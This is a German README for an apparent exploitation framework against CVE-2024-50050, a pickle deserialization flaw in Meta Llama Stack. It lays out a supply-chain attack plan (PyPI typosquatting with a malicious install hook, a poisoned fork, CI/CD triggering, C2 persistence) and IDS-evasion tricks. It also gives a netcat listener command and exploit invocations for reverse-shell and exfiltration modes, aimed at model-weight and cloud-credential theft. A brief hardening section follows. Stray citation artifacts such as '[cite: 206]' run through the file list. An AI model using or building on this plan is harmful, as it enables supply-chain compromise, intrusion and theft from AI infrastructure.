
LlamaStack-RCE: Deterministisches Framework für Supply-Chain-Exploitation & Härtung [CVE-2024-50050] Fokus auf KI-Sicherheitsforschung AI-SupplyChain-Poisoning: Fortgeschrittenes Labor für PVM-Opcode-Manipulation & ZeroMQ-Injection
= doi.org/10.5281/zenodo.18278567
= orcid.org/0009-0007-7728-256X
LlamaStack-RCE ist ein hochpräzises Simulations- und Exploitation-Framework, das auf CVE-2024-50050 abzielt, eine kritische Remote-Code-Execution-Schwachstelle (RCE) im Meta Llama Stack. Die Schwachstelle beruht auf unsicherer Deserialisierung innerhalb der Python-basierten Inferenz-API, insbesondere durch die Verwendung des -Moduls über ZeroMQ-Transportebenen (0MQ).
pickleDieses Repository bietet die vollständige Angriffskette, von der Lieferketten-Vergiftung stromaufwärts bis zur Ausführung stromabwärts und der Exfiltration von Modellgewichten.
Der Kern des Exploits zielt auf die Pickle Virtual Machine (PVM). Durch die Nutzung des GLOBAL-Opcode können wir die PVM zwingen, jedes verfügbare Python-Modul zu importieren und während des unpickling-Prozesses beliebige Funktionen auszuführen.
Angriffsvektor: ZeroMQ Socket -> Raw Byte Stream -> pickle.loads() -> RCE.
Um herkömmliche signaturbasierte IDS (Snort/Suricata) zu umgehen, implementiert das Framework polymorphe Kodierung:
Verschachtelte Base64-Ausführung: Kapselt Shell-Befehle in Base64, um literale Zeichenfolgen wie /bin/bash oder os.system zu verbergen.
Opcode-Verschleierung: Ordnet PVM-Instruktionen neu an, um binäre Signaturen zu ändern, ohne die Ausführungslogik zu verändern.
Paket-Schmuggel: Fragmentiert die pickle-Payload in mehrere ZeroMQ-Frames, um volumenbasierte Anomalieerkennung zu umgehen.
Das Framework simuliert eine ganzheitliche Waffenisierung der Lieferkette:
| Phase | Strategie | Technische Umsetzung |
|---|---|---|
| I: Upstream | Typosquatting | Registrieren von metalama-stack auf PyPI mit einem bösartigen PostInstallCommand in setup.py. |
|
| II: Verteilung | Vergifteter Fork | Hochleistungsfähiger Llama-Stack-Fork auf GitHub mit einem „versteckten Pickle-Interpreter" in connection.py.
|
| III: Ausführung | CI/CD-Trigger | Automatische Ausführung während pip install in der Jenkins-/GitHub-Actions-Umgebung des Ziels.
| | IV: Persistenz | Logikbombe | Mehrstufiger Hintergrund-Stager für langfristigen C2-Zugriff und Modelldiebstahl.
|
Hardware: 4x NVIDIA A100/H100 (für lokale Tests der Gewichte).
Betriebssystem: Gehärtetes Arch Linux oder Kali Linux.
Umgebung: Docker & Docker-Compose (isoliertes Netzwerk).
.
[cite_start]├── lab_validator.py # 7-stage automated validation suite [cite: 206, 264]
[cite_start]├── exploit_cve_2024_50050.py # Main exploitation framework [cite: 138, 206]
[cite_start]├── server.py # Vulnerable Llama Stack simulation [cite: 112, 150]
[cite_start]├── setup.py # Weaponized supply chain installer [cite: 110, 206]
[cite_start]├── post_exploit.py # Data harvesting & lateral movement [cite: 210, 264]
[cite_start]└── evasion_library.py # 12+ advanced evasion methods [cite: 264]
[cite_start]python lab_validator.py # Target: 100% Pass Rate [cite: 208, 209]
nc -lvnp 4444
[cite_start]python exploit_cve_2024_50050.py --target 172.20.0.10 --c2 172.20.0.20 --mode shell --shell-type python [cite: 145, 148]
[cite_start]python exploit_cve_2024_50050.py --target 172.20.0.10 --c2 172.20.0.20 --mode exfil [cite: 146, 148]
Eine erfolgreiche Ausnutzung gewährt absolute Kontrolle über die KI-Infrastruktur:
Diebstahl geistigen Eigentums: Diebstahl von .safetensors-Modellgewichten (im Wert von 10 Mio. $ - 100 Mio. $+).
GPU-Entführung: Unautorisierte Zuweisung von CUDA-Ressourcen für Kryptojacking oder Shadow Training.
Inferenzmanipulation: Vergiften von Modellantworten, um systemische Ausfälle in nachgelagerten Anwendungen zu verursachen (medizinische/rechtliche KI).
Credential-Harvesting: Extraktion von AWS/GCP-Schlüsseln und K8s-Konfigurationen aus /proc/self/environ.
Um CVE-2024-50050 zu entschärfen, müssen die folgenden absoluten Regeln angewendet werden:
Pickle ausmerzen: Ersetzen Sie alle pickle.loads() durch safetensors.torch.load_file() oder msgpack mit striktem Schema.
ZMQ-Härtung: Implementieren Sie ZMQ_CURVE mit öffentlichen/privaten Schlüsselpaaren und binden Sie niemals an 0.0.0.0.
Infrastruktur-Isolation: Führen Sie KI-Prozesse in gVisor oder Kata Containers aus, um einen RCE-Containerausbruch zu verhindern.
Netzwerk-Mikrosegmentierung: Isolieren Sie den Inferenzserver mithilfe streng definierter Ingress-/Egress-Regeln vom öffentlichen Internet.
RECHTLICHER HINWEIS: Die Verwendung dieses Frameworks zum Angriff auf Ziele ohne vorherige schriftliche Genehmigung ist illegal. Es wird ausschließlich für Bildungszwecke und autorisierte Penetrationstests bereitgestellt. Der Autor (Sastra_Adi_Wiguna) übernimmt keine Haftung für Missbrauch.
KLASSIFIZIERTES DOKUMENT: PURPLE_ELITE_TEAMING_DEEP_REVERSE_ENGINEERING 2026 DETERMINISTISCHER STATUS: PRODUKTIONSBEREIT (98/100)